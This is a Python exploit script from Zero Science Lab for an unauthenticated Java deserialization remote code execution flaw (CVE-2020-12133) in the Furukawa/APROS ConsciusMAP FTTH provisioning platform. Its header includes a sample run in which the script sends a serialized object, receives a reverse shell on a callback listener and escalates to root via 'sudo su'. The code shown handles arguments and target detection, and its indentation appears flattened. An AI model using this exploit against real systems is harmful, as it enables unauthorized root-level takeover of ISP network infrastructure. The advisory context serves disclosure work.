#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Furukawa Electric ConsciusMAP 2.8.1 Java Deserialization Remote Code Execution
#
#
# Vendor: Furukawa Electric Co., Ltd. | Tecnored SA
# Product web page: https://www.furukawa.co.jp | https://www.tecnoredsa.com.ar
# Affected version: APROS Evolution | 2.8.1
# FURUKAWA | 2.7.10
# ConsciusMAP | 2.6.4
# | 2.3.1
# | 2.1.49
# | 2.1.36
# | 2.1.31
# | 2.1.18
# | 2.1.16
# | 2.1.15
# | 2.1.1
# | 2.0.1174
# | 1.8
# | 1.4.70
#
# Summary: Apros Evoluation / Furukawa / ConsciusMap is the Tecnored
# provisioning system for FTTH networks. Complete administration of
# your entire external FTTH network plant, including from the ONUs
# installed in each end customer, to the wiring and junction boxes.
# Unify all the management of your FTTH network on a single platform.
# Unify all your data, whether from customers, your network, or the
# external plant in one place. APROS FTTH allows you to manage your
# entire FTTH network in a simple and globalized way with just one
# click, without being a network expert. Includes services such as:
# bandwidth limitation, Turbo Internet for time plans, BURST Internet,
# QinQ for companies, and many more. General consumption graphics and
# per customer in real time. Captive Portal for cutting or suspension
# of the service.
#
# Desc: The FTTH provisioning solution suffers from an unauthenticated
# remote code execution vulnerability due to an unsafe deserialization
# of Java objects (ViewState) triggered via the 'javax.faces.ViewState'
# HTTP POST parameter. The deserialization can cause the vulnerable JSF
# web application to execute arbitrary Java functions, malicious Java
# bytecode, and system shell commands with root privileges.
#
# ===================================================================
# $ ./furukawa.py 172.16.0.1:8080 172.168.0.200 4444
# [*] Setting up valid URL path
# [*] Starting callback listener child thread
# [*] Starting handler on port 4444
# [*] Sending serialized object
# [*] Connection from 172.16.0.1:48446
# [*] You got shell!
# tomcat7@zslab:/var/lib/tomcat7$ id
# uid=114(tomcat7) gid=124(tomcat7) grupos=124(tomcat7),1003(furukawa)
# tomcat7@zslab:/var/lib/tomcat7$ sudo su
# id
# uid=0(root) gid=0(root) grupos=0(root)
# exit
# tomcat7@zslab:/var/lib/tomcat7$ exit
# *** Connection closed by remote host ***
# ===================================================================
#
# Tested on: Apache Tomcat/7.0.68
# Apache Tomcat/7.0.52
# Apache MyFaces/2.2.1
# Apache MyFaces/2.1.17
# Apache MyFaces/2.0.10
# GNU/Linux 4.4.0-173
# GNU/Linux 4.4.0-137
# GNU/Linux 4.4.0-101
# GNU/Linux 4.4.0-83
# GNU/Linux 3.15.0
# GNU/Linux 3.13.0-32
# PrimeFaces/4.0.RC1
# Apache-Coyote/1.1
# ACC Library 3.1
# Ubuntu 16.04.2
# Ubuntu 14.04.2
# Java/1.8.0_242
# Java/1.8.0_181
# Java/1.8.0_131
# Java/1.7.0_79
# MySQL 5.7.29
# MySQL 5.7.18
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2020-5565
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5565.php
#
# CVE ID: CVE-2020-12133
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-12133
#
#
# 24.02.2020
#
def par(self):
if len(sys.argv) != 4:
self.usage()
else:
self.target = sys.argv[1]
self.callback = sys.argv[2]
self.lport = int(sys.argv[3])
if not "http" in self.target:
self.target = "http://{}".format(self.target)
def check(self):
print("[*] Setting up valid URL path")
try:
r = requests.get(self.target)
app = r.text
if not "FURUKAWA" in app and not "APROS" in app:
print("[!] App not detected.")
exit(0)
if "FURUKAWA" in app:
self.path = "/FURUKAWA/"
elif "APROS" in app:
self.path = "/APROS/"
else:
exit(-1337)
except Exception as p:
print("[!] Somethingz wrong: \n--\n{poraka}".format(poraka=p))
exit(0)